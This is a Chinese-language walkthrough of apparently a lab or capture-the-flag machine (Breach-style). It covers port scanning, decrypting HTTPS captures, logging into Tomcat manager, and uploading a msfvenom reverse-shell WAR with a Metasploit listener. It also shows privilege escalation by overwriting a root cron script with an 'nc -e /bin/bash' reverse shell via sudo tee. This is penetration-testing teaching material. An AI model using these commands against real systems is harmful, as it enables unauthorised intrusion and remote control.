1.端口扫描和信息收集

2.CMS后台信息收集

3.解密HTTPS流量

4.tomcat的后台利用

5.提权

1.端口扫描和信息收集：

首先进行主机发现，找到目标机器：

nmap -sP 192.168.110.1/24

 

找到目标机器，进行端口扫描：

nmap -T4 -A -v 192.168.110.140

一共扫到996个开放的端口，正好里面有一个HTTP服务，我们在网页打开看一下：

打开源码发现一个加密的东西，应该是MD5，

解密得到：pgibbons:damnitfeel$goodtobeagang$ta

这看起来像是一个账号和密码

我们继续找一些有用的信息，又发现了一个CMS的管理后台

我们对最初的目录进行目录扫描，看有没有什么遗漏的东西：

dirb http://192.168.110.140

打开看一下：

继续扫一下CMS：

whatweb -v http://192.168.110.140/impresscms/

爆出了一些信息，到这里我们发现了部署的操作系统，但没有发现具体版本，我们可以打开msf去漏洞库看一下有没有相应的漏洞，

searchsploit impresscms

可以将后面的脚本依次利用，但没什么用

2.CMS后台信息收集

 这个后台需要登录，我们之前获得了一个可疑的登录密码，我们试一下

果然，登录成功

随便翻一下，看有没有什么有用的信息

发现一个网址，粘贴到浏览器，下载一个keystore

又发现一个网址，点击，下载一个流量包，并且上面说账号和密码都是tomcat

我们打开流量包看一下：

发现里面有HTTPS，被加密看不了，结合之前我们获得的keystore 应该是获取加密的秘钥

3.解密HTTPS流量

因为我们有一个秘钥，我们查看一下

keytool -list -keystore keystore  密码是:tomcat  （我们之前得到的）

我们生成密钥库，导出证书：

keytool -importkeystore -srckeystore D:\123\keystore -destkeystore D:\123\tomcat.p12 -deststoretype pkcs12 -srcalias tomcat

密码都是tomcat

得到了一个秘钥，我们将秘钥导入到流量包里面解密HTTPS流量

我们解密以后打开一个HTTPS的流量查看一下，正好获得了一个网址：打开

https://192.168.110.140:8443/_M@nag3Me/html

显示我们不能打开页面，因为这是一个HTTPS的页面，需要我们进行抓包操作

我们点击接收风险并且放包

我们得到了一个basic的登录页面，我们继续在流量包里面找看有没有账号密码

我们过滤一下HTTP的流量

ip.src == 192.168.110.140 || ip.dst ==192.168.110.140 and http

tomcat:Tt\5D8F(#!*u=G)4m7zB

登录试一下

成功，并且我们发现这里有一个上传点，要是war包

4.tomcat后台利用

 我们用msfvenom生成一个java的反弹连接war包，

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

将其移动到物理机上，我们先开启一个msf监听再上传：

开启监听： use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set LHOST 192.168.110.128

set LPORT 4444

exploit

我们上传，记住这里点击上传的时候抓包，因为浏览器会进行其他的请求操作，我们要把它过滤了，单独把木马上传上去，然后迅速的点击上传的kali 抓包放包

回显：

反弹成功

5.提权

 我们获得交互式的shell（输入有典型的回显）

 python -c 'import pty;pty. spawn("/bin/bash")'

在当前目录，我们可以进行查找：

1.搜索漏洞

2.find;ls -a

3.history

4.sudo -l    (查看可以用root执行什么权限)

5.查看操作系统版本：uname -a

6.查看password：cat /etc/passwd

看到了操作系统的版本，我们进行查找漏洞：

searchsploit 14.04 Ubuntu

没有对应的版本，我们查看一下

cat /etc/passwd

里面有一个MySQL数据库，我们可以看一下网站部署的路径，查看里面的内容，可能会有数据库连接的账号和密码

cd /var/www

打开看一下：

发现连接数据库的账号为root，密码为空，名字为impresscms

我们连接数据库：

mysql -uroot -p

查看一下数据库：

show tables;

链接上MySQL库：use mysql;

查看表：show tables;

查看：desc user

查询用户名和密码：select user,password from user; 密码可能是MD5

解出密码以后：这个密码可能是数据库的密码，也能是操作系统的登录密码

发现密码，MD5解密：thelaststraw

我们登录milton这个用户，

我们查看历史记录，发现一个用户，我们从这个入手，因为这个用户有sudo的权限

我们找密码，经过一番长时间查找，离谱的是这个密码藏在了网页的图片里面，

我们将图片下载：

wget http://192.168.110.140/images/bill.png

wget http://192.168.110.140/images/cake.jpg

wget http://192.168.110.140/images/initech.jpg

wget http://192.168.110.140/images/milton_beach.jpg

wget http://192.168.110.140/images/swingline.jpg

wget http://192.168.110.140/images/troll.gif

依次查看图片里面的内容：

strings bill.png

最后在一张图片里面发现了密码：coffeestains

我们进行登录

开始查找有用的信息

我们发现一个脚本，打开发现：

这是一个每隔三分钟清理一次其他用户部署的应用删除，那么我们可以利用这个加入一个反弹连接任务

我们查看一下可以用root权限执行的任务：

发现一个执行tee ，和修改脚本不需要密码

这里面有一个tee ，它的作用是把 tee file1 file2 ,可以把file1数据覆盖到file2中去

写一个反弹连接：

echo "nc -e /bin/bash 192.168.110.128 5555" > shell.txt

用tee 覆盖：

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看一下是否成功：

cat /usr/share/cleanup/tidyup.sh

要先建立监听：

nc -lvvp 5555

最多三分钟反弹

反弹成功：